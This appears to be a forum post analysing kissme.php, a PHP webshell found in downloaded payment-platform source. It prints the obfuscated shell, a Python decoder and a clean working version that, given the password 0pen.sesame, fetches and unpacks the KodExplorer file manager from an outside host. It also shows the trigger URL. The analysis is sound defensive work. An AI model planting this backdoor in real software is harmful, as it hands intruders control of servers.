Just saying hi: a quick analysis of a small PHP webshell
A few days ago I downloaded the source code of a payment platform from the internet and found that a file in it, kissme.php, was flagged by antivirus.
The extracted code is shown in the screenshot below.
I could not be bothered to untangle it by hand,
so I dropped it straight into an online PHP beautifier and got the following code:
<?php
if (!defined("AAAGAGA")) define("AAAGAGA", "AAAGAAG");
$GLOBALS = explode("|^|K|3", "H*|^|K|341414741474747");
if (!defined(pack($GLOBALS, $GLOBALS))) define(pack($GLOBALS, $GLOBALS) , ord(1));
if (!defined("AAAGGAA")) define("AAAGGAA", "AAAGAGG");
$GLOBALS = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
if (!defined(pack($GLOBALS{0}, $GLOBALS{01}))) define(pack($GLOBALS{0}, $GLOBALS{01}) , pack($GLOBALS{0}, $GLOBALS));
$GLOBALS = explode(pack($GLOBALS{0}, $GLOBALS{3}) , pack($GLOBALS{0}, $GLOBALS));
if (!defined("AAAGGGA")) define("AAAGGGA", "AAAGGAG");
$GLOBALS = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
if (!$GLOBALS{0x1}(pack($GLOBALS{0x0}, $GLOBALS{1}))) \call_user_func(pack($GLOBALS{0x0}, $GLOBALS) , pack($GLOBALS{0x0}, $GLOBALS{1}) , pack($GLOBALS{0x0}, $GLOBALS{03}));
$GLOBALS = array(
    $_GET
);
$AGAAAAG = & $passwd;
$AGAAAAA = & $ch;
$AAGGGGG = & $source;
$AAGGGGA = & $data;
$AAGGGAG = & $destination;
$file = & $AAGGGAA;
$AAGGAGG = & $zip;
$file_path = & $AAGGAGA;
$AGAAAAG = isset($GLOBALS[(0 - 1225 + 25 * AAGAGGG) ]{0x0}, $GLOBALS{4}) ]) ? $GLOBALS[(0 - 1225 + 25 * AAGAGGG) ]{0x0}, $GLOBALS{4}) ] : pack($GLOBALS{0x0}, $GLOBALS);
if ($AGAAAAG != pack($GLOBALS{0x0}, $GLOBALS)) {
    exit;
}
$AGAAAAA = curl_init();
$AAGGGGG = pack($GLOBALS{0x0}, $GLOBALS{07});
curl_setopt($AGAAAAA, CURLOPT_URL, $AAGGGGG);
curl_setopt($AGAAAAA, CURLOPT_RETURNTRANSFER, (AAGAGGG * 41 - 2008));
$AAGGGGA = curl_exec($AGAAAAA);
curl_close($AGAAAAA);
$AAGGGAG = pack($GLOBALS{0x0}, $GLOBALS{0x8});
$AAGGGAA = $GLOBALS{02}($AAGGGAG, pack($GLOBALS{0x0}, $GLOBALS));
$GLOBALS{03}($AAGGGAA, $AAGGGGA);
$GLOBALS{0x4}($AAGGGAA);
$AAGGAGG = new ZipArchive();
if ($AAGGAGG->open(pack($GLOBALS{0x0}, $GLOBALS)) === true) {
    $AAGGAGG->extractTo(pack($GLOBALS{0x0}, $GLOBALS{11}));
    $AAGGAGG->close();
}
$AAGGAGA = pack($GLOBALS{0x0}, $GLOBALS{0x8});
if ($GLOBALS{05}($AAGGAGA)) {
    if ($GLOBALS($AAGGAGA)) {
    }
}
echo pack($GLOBALS{0x0}, $GLOBALS{0xC});
?>
That looks a bit more readable now, so let's analyze it step by step.
We start with the longer strings. Look at line 7 of the listing:
$GLOBALS = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
explode() splits its second argument into an array, using its first argument as the delimiter.
We can add a print_r() call to dump the $GLOBALS array and look at the result:
Array
(
    [0] => H*
    [1] => 41414741474741
    [2] => 41414741474147
    [3] => 7C3A7C2D7C35
    [4] => 7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B
)
Now decode the array above with pack(), for example echo pack("H*","41414741474741"); (the first argument is element [0] of the array, the second argument is element [1], [2], [3] or [4] in turn). This gives:
[1] => AAGAGGA
[2] => AAGAGAG
[3] => |:|-|5
[4] => |:|-|5defined|:|-|5fopen|:|-|5fputs|:|-|5fclose|:|-|5is_file|:|-|5unlink
// Here [3] and [4] are the same kind of pair as the code above (a delimiter and a joined list); splitting [4] on [3] gives:
(
    [0] =>
    [1] => defined
    [2] => fopen
    [3] => fputs
    [4] => fclose
    [5] => is_file
    [6] => unlink
)
At this point the declaration part is essentially done.
------------------------------------------------------------------------------------------------
Continuing, we come to line 33:
$GLOBALS = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
Using the same method, we get this array:
Array
(
    [0] => H*
    [1] => 41414747414147
    [2] => 646566696E65
    [3] => 41414747414141
    [4] => 70
    [5] =>
    [6] => 3070656e2e736573616d65
    [7] => 687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970
    [8] => 2E2F6B6F642E7A6970
    [9] => 772B
    [10] => 6B6F642E7A6970
    [11] => 6B6F642F
    [12] => 3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A
)
// Decoding each element with pack() in turn gives:
[1] => AAGGAAG
[2] => define
[3] => AAGGAAA
[4] => p
[5] =>
[6] => 0pen.sesame
[7] => http://static.kodcloud.com/update/download/kodexplorer4.40.zip
[8] => ./kod.zip
[9] => w+
[10] => kod.zip
[11] => kod/
[12] => <a href="./kod" target="_blank">执行成功点击进入</a>
At this point we have basically worked out what the shell does.
The author of this shell piggybacks on KodExplorer (可道云), a web-based file manager.
Of the values decoded above, p is the name of the parameter carrying the shell's connection password, and 0pen.sesame is that password (open sesame??).
Once the password parameter is supplied, the server downloads the KodExplorer zip package and extracts it; the extracted files end up in the kod folder under the shell's own directory.
It then returns a link (the anchor text 执行成功点击进入 means "executed successfully, click to enter"); clicking it opens the file manager directly.
Verifying the shell:
Put kissme.php in a directory and browse to http://127.0.0.1/kissme.php?p=0pen.sesame
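As an added example, not part of the original post, here is a small Python script that replays the two-layer explode()/pack("H*") string hiding walked through above for all three string tables, and also resolves the two integer disguises built on define("AAGAGGG", ord(1)): PHP's ord() casts 1 to "1", so the constant is 49, which makes 0 - 1225 + 25 * AAGAGGG equal 0 (the index into array($_GET)) and AAGAGGG * 41 - 2008 equal 1 (the CURLOPT_RETURNTRANSFER value). The sample source is constructed from the explode() calls on the page; all function names are my own.

```python
import re

# Constructed sample: the three explode() calls of kissme.php, copied from the listing above.
SAMPLE_PHP = r'''
$GLOBALS = explode("|^|K|3", "H*|^|K|341414741474747");
$GLOBALS = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");
$GLOBALS = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");
'''

# Matches explode("<delim>", "<payload>"); neither part contains a double quote in this sample.
EXPLODE_RE = re.compile(r'explode\("([^"]+)",\s*"([^"]*)"\)')


def decode_pack_list(delim, payload):
    """Replay explode($delim, $payload) followed by pack($list[0], $list[i]) per element.
    Element 0 must be the pack() format "H*" (hex string); it is kept verbatim so the
    result keeps the indices the shell itself uses (e.g. $list{1}, $list{4}, $list{0xC})."""
    parts = payload.split(delim)
    if parts[0] != "H*":
        raise ValueError("element 0 is not the H* pack() format: %r" % parts[0])
    # bytes.fromhex() accepts mixed-case hex and the empty string (element 5 of table 3)
    return [parts[0]] + [bytes.fromhex(h).decode("utf-8") for h in parts[1:]]


def decode_source(php_src):
    """Decode every H* explode() string table found in a piece of PHP source."""
    return [decode_pack_list(d, p) for d, p in EXPLODE_RE.findall(php_src)
            if p.startswith("H*" + d)]


def expand_inner_list(table, sep_index, list_index):
    """Second layer used by table 2: one element is a separator, another a joined name list."""
    return table[list_index].split(table[sep_index])


def php_ord(value):
    """PHP's ord() casts its argument to string first, so ord(1) is ord("1") == 49."""
    return ord(str(value)[0])


def resolve_int_tricks(c):
    """The two arithmetic disguises in kissme.php, with c = AAGAGGG = php_ord(1)."""
    return {"get_index": 0 - 1225 + 25 * c,    # index into array($_GET): 0
            "returntransfer": c * 41 - 2008}   # value given to CURLOPT_RETURNTRANSFER: 1


if __name__ == "__main__":
    for table in decode_source(SAMPLE_PHP):
        print(table)
    print(resolve_int_tricks(php_ord(1)))
```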
After a moment the link is printed; clicking it opens the KodExplorer file manager.

The de-obfuscated code:

<?php
// the connection password arrives in the GET parameter "p"
$passwd = isset($_GET['p']) ? $_GET['p'] : '';
if ($passwd != '0pen.sesame') {
    exit;
}
// download the KodExplorer 4.40 package from the vendor's site
$ch = curl_init();
$source = 'http://static.kodcloud.com/update/download/kodexplorer4.40.zip';
curl_setopt($ch, CURLOPT_URL, $source);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($ch);
curl_close($ch);
// write it to ./kod.zip next to the shell
$destination = './kod.zip';
$AAGGGAA = fopen($destination, 'w+');
fputs($AAGGGAA, $data);
fclose($AAGGGAA);
// unpack into ./kod/ and delete the archive afterwards
$zip = new ZipArchive();
if ($zip->open('kod.zip') === true) {
    $zip->extractTo('kod/');
    $zip->close();
}
$AAGGAGA = './kod.zip';
if (is_file($AAGGAGA)) {
    if (unlink($AAGGAGA)) {
    }
}
// hand back a link to the extracted file manager
echo "<a href=\"./kod\" target=\"_blank\">执行成功点击进入</a>\n";

Replies:

A real old hand at code restoration.

无痕978 posted on 2022-1-18 13:00: A friend wants to know the address of that online beautifier site.

Quoting 无痕978 (2022-1-18 13:00): A friend wants to know the address of that online beautifier site.
Search Baidu for "php 在线格式化" (PHP online formatter).

Thorough analysis, very good, worth learning from.

The way this shell works is really sneaky; learned something.

Learned something, nice.

Thanks for sharing.